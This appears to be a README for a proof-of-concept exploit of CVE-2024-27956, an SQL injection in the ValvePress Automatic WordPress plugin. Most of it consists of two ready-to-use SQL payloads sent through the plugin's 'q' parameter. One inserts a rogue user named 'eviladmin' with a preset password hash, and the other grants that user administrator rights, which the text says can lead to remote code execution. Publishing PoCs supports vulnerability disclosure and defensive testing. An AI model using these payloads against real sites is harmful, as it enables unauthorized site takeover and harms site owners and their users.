# CVE-2024-27956-RCE
A PoC for CVE-2024-27956, a SQL Injection in ValvePress Automatic plugin. This PoC exploit the vulnerability creating a user in the target and giving Administrator rights. Being an administrator in wordpress can lead to Remote Code Execution.


git clone
cd CVE-2024-27956-RCE

SQL Injection payload to create a user:

q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '', '', '2024-04-30 16:26:43', 0, 'eviladmin')

Giving admin rights:

q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

In the q parameter, we can pass our entire query and then it will be executed.

The user input is executed directly without any kind of restriction or sanitization.

<a href=""><img src="Screenshot_2.png"></a>